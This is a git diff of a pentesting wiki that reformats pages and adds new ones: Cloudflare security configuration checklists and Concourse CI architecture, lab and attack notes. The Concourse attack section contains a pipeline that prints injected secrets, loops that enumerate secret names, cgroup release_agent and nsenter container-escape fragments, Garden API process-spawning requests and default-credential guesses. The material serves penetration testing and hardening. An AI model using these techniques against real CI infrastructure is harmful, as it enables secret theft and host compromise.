**`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise. +- [ ] Just **check this information** for security misconfigurations and interesting info + +## Turnstile + +TODO + +## **Zero Trust** + +{{#ref}} +cloudflare-zero-trust-network.md +{{#endref}} + +## Bulk Redirects + +> [!NOTE] +> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static — they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior. + +- [ ] Check that the **expressions** and **requirements** for redirects **make sense**. +- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info. + +## Notifications + +- [ ] Check the **notifications.** These notifications are recommended for security: + - `Usage Based Billing` + - `HTTP DDoS Attack Alert` + - `Layer 3/4 DDoS Attack Alert` + - `Advanced HTTP DDoS Attack Alert` + - `Advanced Layer 3/4 DDoS Attack Alert` + - `Flow-based Monitoring: Volumetric Attack` + - `Route Leak Detection Alert` + - `Access mTLS Certificate Expiration Alert` + - `SSL for SaaS Custom Hostnames Alert` + - `Universal SSL Alert` + - `Script Monitor New Code Change Detection Alert` + - `Script Monitor New Domain Alert` + - `Script Monitor New Malicious Domain Alert` + - `Script Monitor New Malicious Script Alert` + - `Script Monitor New Malicious URL Alert` + - `Script Monitor New Scripts Alert` + - `Script Monitor New Script Exceeds Max URL Length Alert` + - `Advanced Security Events Alert` + - `Security Events Alert` +- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS** + - [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous** + +## Manage Account + +- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**. +- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**. +- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle. + - Therefore, whenever possible is **recommended** to use the **Enterprise plan**. +- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled. + +> [!NOTE] +> Note that fortunately the role **`Administrator`** doesn't give permissions to manage memberships (**cannot escalate privs or invite** new members) + +## DDoS Investigation + +[Check this part](cloudflare-domains.md#cloudflare-ddos-protection). + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md new file mode 100644 index 000000000..8f3665647 --- /dev/null +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-domains.md @@ -0,0 +1,133 @@ +# Cloudflare Domains + +{{#include ../../banners/hacktricks-training.md}} + +In each TLD configured in Cloudflare there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** + +
+ +### Overview + +- [ ] Get a feeling of **how much** are the services of the account **used** +- [ ] Find also the **zone ID** and the **account ID** + +### Analytics + +- [ ] In **`Security`** check if there is any **Rate limiting** + +### DNS + +- [ ] Check **interesting** (sensitive?) data in DNS **records** +- [ ] Check for **subdomains** that could contain **sensitive info** just based on the **name** (like admin173865324.domin.com) +- [ ] Check for web pages that **aren't** **proxied** +- [ ] Check for **proxified web pages** that can be **accessed directly** by CNAME or IP address +- [ ] Check that **DNSSEC** is **enabled** +- [ ] Check that **CNAME Flattening** is **used** in **all CNAMEs** + - This is could be useful to **hide subdomain takeover vulnerabilities** and improve load timings +- [ ] Check that the domains [**aren't vulnerable to spoofing**](https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp#mail-spoofing) + +### **Email** + +TODO + +### Spectrum + +TODO + +### SSL/TLS + +#### **Overview** + +- [ ] The **SSL/TLS encryption** should be **Full** or **Full (Strict)**. Any other will send **clear-text traffic** at some point. +- [ ] The **SSL/TLS Recommender** should be enabled + +#### Edge Certificates + +- [ ] **Always Use HTTPS** should be **enabled** +- [ ] **HTTP Strict Transport Security (HSTS)** should be **enabled** +- [ ] **Minimum TLS Version should be 1.2** +- [ ] **TLS 1.3 should be enabled** +- [ ] **Automatic HTTPS Rewrites** should be **enabled** +- [ ] **Certificate Transparency Monitoring** should be **enabled** + +### **Security** + +- [ ] In the **`WAF`** section it's interesting to check that **Firewall** and **rate limiting rules are used** to prevent abuses. + - The **`Bypass`** action will **disable Cloudflare security** features for a request. It shouldn't be used. +- [ ] In the **`Page Shield`** section it's recommended to check that it's **enabled** if any page is used +- [ ] In the **`API Shield`** section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare +- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections** +- [ ] In the **`Settings`** section: + - [ ] Check that the **`Security Level`** is **medium** or greater + - [ ] Check that the **`Challenge Passage`** is 1 hour at max + - [ ] Check that the **`Browser Integrity Check`** is **enabled** + - [ ] Check that the **`Privacy Pass Support`** is **enabled** + +#### **CloudFlare DDoS Protection** + +- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access. +- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie. + - If the attack is from a **verified bot**, at least **add a rate limit** to bots. + - If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path. + - You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF. + - Check if **Managed rules** could also help to prevent vulnerability exploitations. + - In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.** +- In DDoS you could **override some rules to make them more restrictive**. +- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**. +- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled +- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events** + +### Access + +{{#ref}} +cloudflare-zero-trust-network.md +{{#endref}} + +### Speed + +_I couldn't find any option related to security_ + +### Caching + +- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool** + +### **Workers Routes** + +_You should have already checked_ [_cloudflare workers_](./#workers) + +### Rules + +TODO + +### Network + +- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled** +- [ ] **`HTTP/3 (with QUIC)`** should be **enabled** +- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled** + +### **Traffic** + +TODO + +### Custom Pages + +- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode) + +### Apps + +TODO + +### Scrape Shield + +- [ ] Check **Email Address Obfuscation** is **enabled** +- [ ] Check **Server-side Excludes** is **enabled** + +### **Zaraz** + +TODO + +### **Web3** + +TODO + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md new file mode 100644 index 000000000..8348eaf6b --- /dev/null +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md @@ -0,0 +1,61 @@ +# Cloudflare Zero Trust Network + +{{#include ../../banners/hacktricks-training.md}} + +In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** + +
+ +### Analytics + +- [ ] Useful to **get to know the environment** + +### **Gateway** + +- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications. + - If used, **policies** could be created to **restrict** the access to malicious sites. + - This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies. + +### Access + +#### Applications + +On each application: + +- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access. + - To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also) +- [ ] Check the **available identity providers** and make sure they **aren't too open** +- [ ] In **`Settings`**: + - [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything) + - [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP. + - [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** + +#### **Access Groups** + +- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow. +- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**. + - Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary. + +#### Service Auth + +- [ ] Check that all service tokens **expires in 1 year or less** + +#### Tunnels + +TODO + +### My Team + +TODO + +### Logs + +- [ ] You could search for **unexpected actions** from users + +### Settings + +- [ ] Check the **plan type** +- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address** +- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/concourse-security/README.md b/src/pentesting-ci-cd/concourse-security/README.md new file mode 100644 index 000000000..d354374ef --- /dev/null +++ b/src/pentesting-ci-cd/concourse-security/README.md @@ -0,0 +1,33 @@ +# Concourse Security + +{{#include ../../banners/hacktricks-training.md}} + +## Basic Information + +Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...) + +## Concourse Architecture + +Learn how the concourse environment is structured in: + +{{#ref}} +concourse-architecture.md +{{#endref}} + +## Concourse Lab + +Learn how you can run a concourse environment locally to do your own tests in: + +{{#ref}} +concourse-lab-creation.md +{{#endref}} + +## Enumerate & Attack Concourse + +Learn how you can enumerate the concourse environment and abuse it in: + +{{#ref}} +concourse-enumeration-and-attacks.md +{{#endref}} + +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md new file mode 100644 index 000000000..250af06ad --- /dev/null +++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md @@ -0,0 +1,38 @@ +# Concourse Architecture + +## Concourse Architecture + +{{#include ../../banners/hacktricks-training.md}} + +[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html) + +### Architecture + +![](<../../images/image (187).png>) + +#### ATC: web UI & build scheduler + +The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). + +The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. + +#### TSA: worker registration & forwarding + +The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). + +The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. + +The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). + +#### Workers + +In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). + +- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. +- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. + +## References + +- [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md similarity index 66% rename from pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md rename to src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md index 4cdbcc7d0..538c0a92b 100644 --- a/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md @@ -2,34 +2,20 @@ ## Concourse Enumeration & Attacks -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ### User Roles & Permissions Concourse comes with five roles: -* _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC. -* **owner**: Team owners can **modify everything within the team**. -* **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings. -* **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations. -* **viewer**: Team viewers have **"read-only" access to a team** and its pipelines. +- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC. +- **owner**: Team owners can **modify everything within the team**. +- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings. +- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations. +- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines. -{% hint style="info" %} -Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) -{% endhint %} +> [!NOTE] +> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them. @@ -45,36 +31,35 @@ Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by doub Static vars can be specified in **tasks steps**: ```yaml - - task: unit-1.13 - file: booklit/ci/unit.yml - vars: {tag: 1.13} +- task: unit-1.13 + file: booklit/ci/unit.yml + vars: { tag: 1.13 } ``` Or using the following `fly` **arguments**: -* `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`. -* `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`. -* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. -* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. +- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`. +- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`. +- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. +- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. #### Credential Management There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ Moreover, Concourse supports different credential managers: -* [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html) -* [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html) -* [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html) -* [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html) -* [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html) -* [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html) -* [Caching credentials](https://concourse-ci.org/creds-caching.html) -* [Redacting credentials](https://concourse-ci.org/creds-redacting.html) -* [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html) +- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html) +- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html) +- [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html) +- [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html) +- [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html) +- [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html) +- [Caching credentials](https://concourse-ci.org/creds-caching.html) +- [Redacting credentials](https://concourse-ci.org/creds-redacting.html) +- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html) -{% hint style="danger" %} -Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them. -{% endhint %} +> [!CAUTION] +> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them. ### Concourse Enumeration @@ -82,41 +67,40 @@ In order to enumerate a concourse environment you first need to **gather valid c #### Login and Current User enum -* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: - * `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` -* Get configured **targets**: - * `fly targets` -* Get if the configured **target connection** is still **valid**: - * `fly -t status` -* Get **role** of the user against the indicated target: - * `fly -t userinfo` +- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: + - `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` +- Get configured **targets**: + - `fly targets` +- Get if the configured **target connection** is still **valid**: + - `fly -t status` +- Get **role** of the user against the indicated target: + - `fly -t userinfo` -{% hint style="info" %} -Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials. -{% endhint %} +> [!NOTE] +> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials. #### Teams & Users -* Get a list of the Teams - * `fly -t teams` -* Get roles inside team - * `fly -t get-team -n ` -* Get a list of users - * `fly -t active-users` +- Get a list of the Teams + - `fly -t teams` +- Get roles inside team + - `fly -t get-team -n ` +- Get a list of users + - `fly -t active-users` #### Pipelines -* **List** pipelines: - * `fly -t pipelines -a` -* **Get** pipeline yaml (**sensitive information** might be found in the definition): - * `fly -t get-pipeline -p ` -* Get all pipeline **config declared vars** - * `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` -* Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them): +- **List** pipelines: + - `fly -t pipelines -a` +- **Get** pipeline yaml (**sensitive information** might be found in the definition): + - `fly -t get-pipeline -p ` +- Get all pipeline **config declared vars** + - `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` +- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them): ```bash rm /tmp/secrets.txt; -for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do +for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; echo ""; @@ -129,19 +113,19 @@ rm /tmp/secrets.txt #### Containers & Workers -* List **workers**: - * `fly -t workers` -* List **containers**: - * `fly -t containers` -* List **builds** (to see what is running): - * `fly -t builds` +- List **workers**: + - `fly -t workers` +- List **containers**: + - `fly -t containers` +- List **builds** (to see what is running): + - `fly -t builds` ### Concourse Attacks #### Credentials Brute-Force -* admin:admin -* test:test +- admin:admin +- test:test #### Secrets and params enumeration @@ -158,9 +142,9 @@ fly -t tutorial intercept # To be presented a prompt with all the options With these permissions you might be able to: -* **Steal the secrets** inside the **container** -* Try to **escape** to the node -* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) +- **Steal the secrets** inside the **container** +- Try to **escape** to the node +- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) #### Pipeline Creation/Modification @@ -168,34 +152,34 @@ If you have enough privileges (**member role or more**) you will be able to **cr ```yaml jobs: -- name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - echo "$SUPER_SECRET" - sleep 1000 - params: - SUPER_SECRET: ((super.secret)) + - name: simple + plan: + - task: simple-task + privileged: true + config: + # Tells Concourse which type of worker this task should run on + platform: linux + image_resource: + type: registry-image + source: + repository: busybox # images are pulled from docker hub by default + run: + path: sh + args: + - -cx + - | + echo "$SUPER_SECRET" + sleep 1000 + params: + SUPER_SECRET: ((super.secret)) ``` With the **modification/creation** of a new pipeline you will be able to: -* **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`) -* **Escape** to the **node** (by giving you enough privileges - `privileged: true`) -* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) -* **Delete** created pipeline +- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`) +- **Escape** to the **node** (by giving you enough privileges - `privileged: true`) +- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) +- **Delete** created pipeline #### Execute Custom Task @@ -211,10 +195,10 @@ image_resource: run: path: sh args: - - -cx - - | - env - sleep 1000 + - -cx + - | + env + sleep 1000 params: SUPER_SECRET: ((super.secret)) ``` @@ -227,7 +211,7 @@ fly -t tutorial execute --privileged --config task_config.yml In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex". -In the following PoC we are going to use the release\_agent to escape with some small modifications: +In the following PoC we are going to use the release_agent to escape with some small modifications: ```bash # Mounts the RDMA cgroup controller and create a child cgroup @@ -287,13 +271,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" cat /output ``` -{% hint style="warning" %} -As you might have noticed this is just a [**regular release\_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node -{% endhint %} +> [!WARNING] +> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node #### Escaping to the node from a Worker container -A regular release\_agent escape with a minor modification is enough for this: +A regular release_agent escape with a minor modification is enough for this: ```bash mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x @@ -364,14 +347,13 @@ select * from users; #### Abusing Garden Service - Not a real Attack -{% hint style="warning" %} -This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before -{% endhint %} +> [!WARNING] +> This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections: -* It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker. -* The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service. +- It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker. +- The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service. Concourse workers run with high container privileges: @@ -386,11 +368,10 @@ Capabilities: Seccomp: disabled ``` -However, techniques like **mounting** the /dev device of the node or release\_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated. +However, techniques like **mounting** the /dev device of the node or release_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated. -{% hint style="info" %} -In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**. -{% endhint %} +> [!NOTE] +> In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**. Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it. @@ -410,7 +391,7 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ --header='Content-Type:application/json' \ 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' - + # OR instead of doing all of that, you could just get into the ns of the process of the privileged container nsenter --target 76011 --mount --uts --ipc --net --pid -- sh ``` @@ -456,19 +437,6 @@ Accept-Encoding: gzip. ## References -* https://concourse-ci.org/vars.html +- https://concourse-ci.org/vars.html -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md similarity index 53% rename from pentesting-ci-cd/concourse-security/concourse-lab-creation.md rename to src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md index 2e65c7407..14b3c7845 100644 --- a/pentesting-ci-cd/concourse-security/concourse-lab-creation.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md @@ -1,19 +1,6 @@ # Concourse Lab Creation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Testing Environment @@ -71,7 +58,7 @@ subjects: - kind: ServiceAccount name: concourse-release-web namespace: default - + --- apiVersion: v1 @@ -94,15 +81,15 @@ A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which Several different type of steps can be used: -* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) -* the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) -* the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) -* the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) -* the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars) -* the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel -* the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence -* the [`across` step 